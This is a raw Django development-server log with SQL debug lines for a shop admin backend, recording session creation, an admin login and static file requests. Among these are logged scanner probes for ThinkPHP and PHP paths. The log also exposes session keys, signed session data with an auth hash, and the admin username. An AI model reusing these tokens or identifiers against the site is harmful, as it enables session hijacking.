139709937760000 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('x8t54qm75qe4bjqgs87n9qjz9uo75di2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-17T22:58:17.821984+00:00'::timestamptz); args=('x8t54qm75qe4bjqgs87n9qjz9uo75di2', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 17, 22, 58, 17, 821984, tzinfo=)) [03/Dec/2019 22:58:17] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /proxy.php [03/Dec/2019 23:01:13] "GET /proxy.php HTTP/1.0" 404 6407 [03/Dec/2019 23:02:10] "GET / HTTP/1.0" 302 0 [03/Dec/2019 23:07:11] "GET / HTTP/1.0" 302 0 [03/Dec/2019 23:12:17] "GET / HTTP/1.0" 302 0 Not Found: /TP/public/index.php [03/Dec/2019 23:16:02] "GET /TP/public/index.php HTTP/1.0" 404 6432 Not Found: /TP/index.php [03/Dec/2019 23:16:03] "GET /TP/index.php HTTP/1.0" 404 6411 Not Found: /thinkphp/html/public/index.php [03/Dec/2019 23:16:03] "GET /thinkphp/html/public/index.php HTTP/1.0" 404 6465 Not Found: /html/public/index.php [03/Dec/2019 23:16:04] "GET /html/public/index.php HTTP/1.0" 404 6438 Not Found: /public/index.php [03/Dec/2019 23:16:04] "GET /public/index.php HTTP/1.0" 404 6423 Not Found: /TP/html/public/index.php [03/Dec/2019 23:16:05] "GET /TP/html/public/index.php HTTP/1.0" 404 6447 Not Found: /elrekt.php [03/Dec/2019 23:16:05] "GET /elrekt.php HTTP/1.0" 404 6405 Not Found: /index.php [03/Dec/2019 23:16:06] "GET /index.php HTTP/1.0" 404 6402 [03/Dec/2019 23:16:07] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-03 23:16:08,534 utils 7577 139709937760000 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'juvcz2hywsxsdp3ihc2yqwpzw70m84h4' LIMIT 1; args=('juvcz2hywsxsdp3ihc2yqwpzw70m84h4',) DEBUG 2019-12-03 23:16:08,537 utils 7577 139709937760000 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('juvcz2hywsxsdp3ihc2yqwpzw70m84h4', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-17T23:16:08.535046+00:00'::timestamptz); args=('juvcz2hywsxsdp3ihc2yqwpzw70m84h4', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 17, 23, 16, 8, 535046, tzinfo=)) [03/Dec/2019 23:16:08] "GET /login/?next=/ HTTP/1.0" 200 1786 [03/Dec/2019 23:17:21] "GET / HTTP/1.0" 302 0 [03/Dec/2019 23:22:29] "GET / HTTP/1.0" 302 0 [03/Dec/2019 23:27:32] "GET / HTTP/1.0" 302 0 [03/Dec/2019 23:32:37] "GET / HTTP/1.0" 302 0 [03/Dec/2019 23:37:37] "GET / HTTP/1.0" 302 0 [03/Dec/2019 23:42:40] "GET / HTTP/1.0" 302 0 [03/Dec/2019 23:47:46] "GET / HTTP/1.0" 302 0 [03/Dec/2019 23:50:01] "GET /whm-server-status HTTP/1.0" 301 0 [03/Dec/2019 23:52:52] "GET / HTTP/1.0" 302 0 [03/Dec/2019 23:57:58] "GET / HTTP/1.0" 302 0 [04/Dec/2019 00:03:00] "GET / HTTP/1.0" 302 0 [04/Dec/2019 00:08:06] "GET / HTTP/1.0" 302 0 [04/Dec/2019 00:13:08] "GET / HTTP/1.0" 302 0 [04/Dec/2019 00:13:53] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-04 00:13:55,625 utils 7577 139709937760000 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'fhkzh0r33hqmg4vxy3drki146ykegsqc' LIMIT 1; args=('fhkzh0r33hqmg4vxy3drki146ykegsqc',) DEBUG 2019-12-04 00:13:55,627 utils 7577 139709937760000 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('fhkzh0r33hqmg4vxy3drki146ykegsqc', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-18T00:13:55.625827+00:00'::timestamptz); args=('fhkzh0r33hqmg4vxy3drki146ykegsqc', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 18, 0, 13, 55, 625827, tzinfo=)) [04/Dec/2019 00:13:55] "GET /login/?next=/ HTTP/1.0" 200 1786 [04/Dec/2019 00:18:15] "GET / HTTP/1.0" 302 0 [04/Dec/2019 00:23:17] "GET / HTTP/1.0" 302 0 [04/Dec/2019 00:28:19] "GET / HTTP/1.0" 302 0 [04/Dec/2019 00:33:19] "GET / HTTP/1.0" 302 0 [04/Dec/2019 00:38:20] "GET / HTTP/1.0" 302 0 [04/Dec/2019 00:43:25] "GET / HTTP/1.0" 302 0 [04/Dec/2019 00:48:30] "GET / HTTP/1.0" 302 0 [04/Dec/2019 00:53:30] "GET / HTTP/1.0" 302 0 [04/Dec/2019 00:58:31] "GET / HTTP/1.0" 302 0 [04/Dec/2019 01:03:34] "GET / HTTP/1.0" 302 0 [04/Dec/2019 01:08:36] "GET / HTTP/1.0" 302 0 [04/Dec/2019 01:13:40] "GET / HTTP/1.0" 302 0 [04/Dec/2019 01:18:47] "GET / HTTP/1.0" 302 0 [04/Dec/2019 01:23:52] "GET / HTTP/1.0" 302 0 [04/Dec/2019 01:28:57] "GET / HTTP/1.0" 302 0 [04/Dec/2019 01:33:58] "GET / HTTP/1.0" 302 0 [04/Dec/2019 01:39:04] "GET / HTTP/1.0" 302 0 [04/Dec/2019 01:44:11] "GET / HTTP/1.0" 302 0 [04/Dec/2019 01:49:16] "GET / HTTP/1.0" 302 0 [04/Dec/2019 01:54:20] "GET / HTTP/1.0" 302 0 [04/Dec/2019 01:58:17] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-04 01:58:17,826 utils 7577 139709937760000 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ncu9nip1yq98apfw8o17d9o38ztzbw5k' LIMIT 1; args=('ncu9nip1yq98apfw8o17d9o38ztzbw5k',) DEBUG 2019-12-04 01:58:17,828 utils 7577 139709937760000 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ncu9nip1yq98apfw8o17d9o38ztzbw5k', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-18T01:58:17.827380+00:00'::timestamptz); args=('ncu9nip1yq98apfw8o17d9o38ztzbw5k', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 18, 1, 58, 17, 827380, tzinfo=)) [04/Dec/2019 01:58:17] "GET /login/?next=/ HTTP/1.0" 200 1786 [04/Dec/2019 01:59:22] "GET / HTTP/1.0" 302 0 [04/Dec/2019 02:04:25] "GET / HTTP/1.0" 302 0 [04/Dec/2019 02:09:33] "GET / HTTP/1.0" 302 0 [04/Dec/2019 02:11:29] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-04 02:11:30,038 utils 7577 139709937760000 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '0zh3xa24g3il1xd0sfx4javs0i1luor3' LIMIT 1; args=('0zh3xa24g3il1xd0sfx4javs0i1luor3',) DEBUG 2019-12-04 02:11:30,041 utils 7577 139709937760000 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('0zh3xa24g3il1xd0sfx4javs0i1luor3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-18T02:11:30.039240+00:00'::timestamptz); args=('0zh3xa24g3il1xd0sfx4javs0i1luor3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 18, 2, 11, 30, 39240, tzinfo=)) [04/Dec/2019 02:11:30] "GET /login/?next=/ HTTP/1.0" 200 1786 [04/Dec/2019 02:14:37] "GET / HTTP/1.0" 302 0 [04/Dec/2019 02:16:21] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-04 02:16:21,621 utils 7577 139709937760000 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'cscwoxn7uho63uafzl7imf6v05nrc8vl' LIMIT 1; args=('cscwoxn7uho63uafzl7imf6v05nrc8vl',) DEBUG 2019-12-04 02:16:21,623 utils 7577 139709937760000 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('cscwoxn7uho63uafzl7imf6v05nrc8vl', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-18T02:16:21.622209+00:00'::timestamptz); args=('cscwoxn7uho63uafzl7imf6v05nrc8vl', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 18, 2, 16, 21, 622209, tzinfo=)) [04/Dec/2019 02:16:21] "GET /login/?next=/ HTTP/1.0" 200 1786 [04/Dec/2019 02:19:42] "GET / HTTP/1.0" 302 0 [04/Dec/2019 02:24:48] "GET / HTTP/1.0" 302 0 [04/Dec/2019 02:29:48] "GET / HTTP/1.0" 302 0 /home/resfx/public_html/admin.resfx.com/backend/django_shop_tutorial/urls.py changed, reloading. Performing system checks... December 03, 2019 - 13:56:25 Django version 2.2.7, using settings 'django_shop_tutorial.settings' Starting development server at http://127.0.0.1:8000/ Quit the server with CONTROL-C. Watching for file changes with StatReloader System check identified some issues: WARNINGS: ?: (urls.W005) URL namespace 'admin' isn't unique. You may not be able to reverse all URLs in this namespace System check identified 1 issue (0 silenced). DEBUG 2019-12-04 13:16:39,501 utils 9489 140436253398784 (0.013) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-12-04 13:16:39,508 utils 9489 140436253398784 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() [04/Dec/2019 13:30:04] "GET /admin HTTP/1.0" 301 0 DEBUG 2019-12-04 13:30:04,709 utils 9489 140436153108224 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-04T13:30:04.697060+00:00'::timestamptz AND "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'); args=(datetime.datetime(2019, 12, 4, 13, 30, 4, 697060, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') DEBUG 2019-12-04 13:30:04,713 utils 9489 140436153108224 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-04 13:30:04,798 utils 9489 140436153108224 (0.004) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-04 13:30:04,803 utils 9489 140436153108224 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-18T13:30:04.800266+00:00'::timestamptz WHERE "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 18, 13, 30, 4, 800266, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') [04/Dec/2019 13:30:04] "GET /admin/ HTTP/1.0" 200 6019 [04/Dec/2019 13:30:05] "GET /static/admin/css/responsive.css HTTP/1.0" 304 0 [04/Dec/2019 13:30:05] "GET /static/admin/css/dashboard.css HTTP/1.0" 304 0 [04/Dec/2019 13:30:05] "GET /static/admin/css/base.css HTTP/1.0" 304 0 [04/Dec/2019 13:30:06] "GET /static/admin/css/fonts.css HTTP/1.0" 304 0 [04/Dec/2019 13:30:07] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 304 0 [04/Dec/2019 13:30:07] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 304 0 [04/Dec/2019 13:30:07] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [04/Dec/2019 13:30:07] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [04/Dec/2019 13:30:07] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 [04/Dec/2019 13:30:21] "GET /admin HTTP/1.0" 301 0 [04/Dec/2019 13:30:22] "GET /admin/ HTTP/1.0" 302 0 DEBUG 2019-12-04 13:30:22,622 utils 9489 140436153108224 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'gyln86h5fnc6vaahzz7h3tglbms5iv60' LIMIT 1; args=('gyln86h5fnc6vaahzz7h3tglbms5iv60',) DEBUG 2019-12-04 13:30:22,624 utils 9489 140436153108224 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('gyln86h5fnc6vaahzz7h3tglbms5iv60', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-18T13:30:22.622556+00:00'::timestamptz); args=('gyln86h5fnc6vaahzz7h3tglbms5iv60', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 18, 13, 30, 22, 622556, tzinfo=)) [04/Dec/2019 13:30:22] "GET /login/?next=/admin/ HTTP/1.0" 200 1798 [04/Dec/2019 13:30:22] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [04/Dec/2019 13:30:23] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [04/Dec/2019 13:30:23] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [04/Dec/2019 13:30:23] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [04/Dec/2019 13:30:23] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [04/Dec/2019 13:30:23] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [04/Dec/2019 13:30:31] "GET /login HTTP/1.0" 301 0 DEBUG 2019-12-04 13:30:32,042 utils 9489 140436139382528 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-04T13:30:32.026536+00:00'::timestamptz AND "django_session"."session_key" = 'gyln86h5fnc6vaahzz7h3tglbms5iv60'); args=(datetime.datetime(2019, 12, 4, 13, 30, 32, 26536, tzinfo=), 'gyln86h5fnc6vaahzz7h3tglbms5iv60') DEBUG 2019-12-04 13:30:32,094 utils 9489 140436139382528 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-18T13:30:32.091691+00:00'::timestamptz WHERE "django_session"."session_key" = 'gyln86h5fnc6vaahzz7h3tglbms5iv60'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 18, 13, 30, 32, 91691, tzinfo=), 'gyln86h5fnc6vaahzz7h3tglbms5iv60') [04/Dec/2019 13:30:32] "GET /login/ HTTP/1.0" 200 1779 DEBUG 2019-12-04 13:30:58,131 utils 9489 140436139382528 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-04T13:30:58.122863+00:00'::timestamptz AND "django_session"."session_key" = 'gyln86h5fnc6vaahzz7h3tglbms5iv60'); args=(datetime.datetime(2019, 12, 4, 13, 30, 58, 122863, tzinfo=), 'gyln86h5fnc6vaahzz7h3tglbms5iv60') DEBUG 2019-12-04 13:30:58,136 utils 9489 140436139382528 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'resfx-admin'; args=('resfx-admin',) DEBUG 2019-12-04 13:30:58,363 utils 9489 140436139382528 (0.001) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3' LIMIT 1; args=('g6b5kylaf4glm3mfb70u6becl9zozzh3',) DEBUG 2019-12-04 13:30:58,364 utils 9489 140436139382528 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('g6b5kylaf4glm3mfb70u6becl9zozzh3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-18T13:30:58.363577+00:00'::timestamptz); args=('g6b5kylaf4glm3mfb70u6becl9zozzh3', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 18, 13, 30, 58, 363577, tzinfo=)) DEBUG 2019-12-04 13:30:58,366 utils 9489 140436139382528 (0.000) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE "django_session"."session_key" = 'gyln86h5fnc6vaahzz7h3tglbms5iv60'; args=('gyln86h5fnc6vaahzz7h3tglbms5iv60',) DEBUG 2019-12-04 13:30:58,368 utils 9489 140436139382528 (0.001) DELETE FROM "django_session" WHERE "django_session"."session_key" IN ('gyln86h5fnc6vaahzz7h3tglbms5iv60'); args=('gyln86h5fnc6vaahzz7h3tglbms5iv60',) DEBUG 2019-12-04 13:30:58,371 utils 9489 140436139382528 (0.001) UPDATE "auth_user" SET "last_login" = '2019-12-04T13:30:58.369391+00:00'::timestamptz WHERE "auth_user"."id" = 6; args=(datetime.datetime(2019, 12, 4, 13, 30, 58, 369391, tzinfo=), 6) DEBUG 2019-12-04 13:30:58,375 utils 9489 140436139382528 (0.000) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-18T13:30:58.373910+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 18, 13, 30, 58, 373910, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [04/Dec/2019 13:30:58] "POST /login/ HTTP/1.0" 302 0 DEBUG 2019-12-04 13:30:58,671 utils 9489 140436139382528 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-04T13:30:58.661804+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 4, 13, 30, 58, 661804, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-04 13:30:58,674 utils 9489 140436139382528 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-04 13:30:58,707 utils 9489 140436139382528 (0.003) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-04 13:30:58,710 utils 9489 140436139382528 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-18T13:30:58.708688+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 18, 13, 30, 58, 708688, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [04/Dec/2019 13:30:58] "GET / HTTP/1.0" 200 6019 [04/Dec/2019 13:30:58] "GET /static/admin/css/dashboard.css HTTP/1.0" 200 412 [04/Dec/2019 13:30:59] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 [04/Dec/2019 13:30:59] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 200 380 [04/Dec/2019 13:30:59] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 200 331 [04/Dec/2019 13:43:33] "GET / HTTP/1.0" 302 0 [04/Dec/2019 13:46:01] "GET / HTTP/1.0" 302 0 [04/Dec/2019 13:48:36] "GET / HTTP/1.0" 302 0 [04/Dec/2019 13:53:43] "GET / HTTP/1.0" 302 0 [04/Dec/2019 13:58:46] "GET / HTTP/1.0" 302 0 [04/Dec/2019 13:58:54] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-04 13:58:55,199 utils 9489 140436139382528 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'nh5xjaxgo8lcxd8wtqyxshuydbxbtp6q' LIMIT 1; args=('nh5xjaxgo8lcxd8wtqyxshuydbxbtp6q',) DEBUG 2019-12-04 13:58:55,202 utils 9489 140436139382528 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('nh5xjaxgo8lcxd8wtqyxshuydbxbtp6q', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-18T13:58:55.200257+00:00'::timestamptz); args=('nh5xjaxgo8lcxd8wtqyxshuydbxbtp6q', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 18, 13, 58, 55, 200257, tzinfo=)) [04/Dec/2019 13:58:55] "GET /login/?next=/ HTTP/1.0" 200 1786 [04/Dec/2019 14:02:06] "GET /admin HTTP/1.0" 301 0 DEBUG 2019-12-04 14:02:06,966 utils 9489 140436139382528 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-04T14:02:06.952690+00:00'::timestamptz AND "django_session"."session_key" = '7y9bdv74g6u1t80tonbni4iyfj8rht2u'); args=(datetime.datetime(2019, 12, 4, 14, 2, 6, 952690, tzinfo=), '7y9bdv74g6u1t80tonbni4iyfj8rht2u') DEBUG 2019-12-04 14:02:06,969 utils 9489 140436139382528 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-04 14:02:06,999 utils 9489 140436139382528 (0.002) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; 